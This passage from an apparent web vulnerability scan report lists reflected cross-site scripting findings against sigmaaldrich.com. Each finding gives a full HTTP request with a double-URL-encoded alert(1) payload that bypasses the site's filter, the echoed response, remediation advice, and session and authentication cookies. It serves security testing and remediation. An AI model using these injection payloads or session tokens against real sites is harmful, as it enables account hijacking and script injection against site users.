Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/20420%2522%253balert%25281%2529%252f%252f86b2e897c21 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/20420";alert(1)//86b2e897c21","E404") ;
   </script>
...[SNIP]...

1.539. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/epigenetics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c80%2522%253balert%25281%2529%252f%252f04bf9b97a75 was submitted in the REST URL parameter 1. This input was echoed as 95c80";alert(1)//04bf9b97a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science95c80%2522%253balert%25281%2529%252f%252f04bf9b97a75/epigenetics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science95c80";alert(1)//04bf9b97a75/epigenetics.html","E404") ;
   </script>
...[SNIP]...

1.540. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/epigenetics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74122%2522%253balert%25281%2529%252f%252f71dbe4fc838 was submitted in the REST URL parameter 2. This input was echoed as 74122";alert(1)//71dbe4fc838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/74122%2522%253balert%25281%2529%252f%252f71dbe4fc838 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/74122";alert(1)//71dbe4fc838","E404") ;
   </script>
...[SNIP]...

1.541. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b91c%2522%253balert%25281%2529%252f%252f13508bb2221 was submitted in the REST URL parameter 1. This input was echoed as 4b91c";alert(1)//13508bb2221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science4b91c%2522%253balert%25281%2529%252f%252f13508bb2221/functional-genomics-and-rnai.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science4b91c";alert(1)//13508bb2221/functional-genomics-and-rnai.html","E404") ;
   </script>
...[SNIP]...

1.542. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64d76%2522%253balert%25281%2529%252f%252fafeb1d1e910 was submitted in the REST URL parameter 2. This input was echoed as 64d76";alert(1)//afeb1d1e910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/64d76%2522%253balert%25281%2529%252f%252fafeb1d1e910 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/64d76";alert(1)//afeb1d1e910","E404") ;
   </script>
...[SNIP]...

1.543. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1223%2522%253balert%25281%2529%252f%252f822b16cc94e was submitted in the REST URL parameter 1. This input was echoed as c1223";alert(1)//822b16cc94e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencec1223%2522%253balert%25281%2529%252f%252f822b16cc94e/functional-genomics-and-rnai/shrna-library-details.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
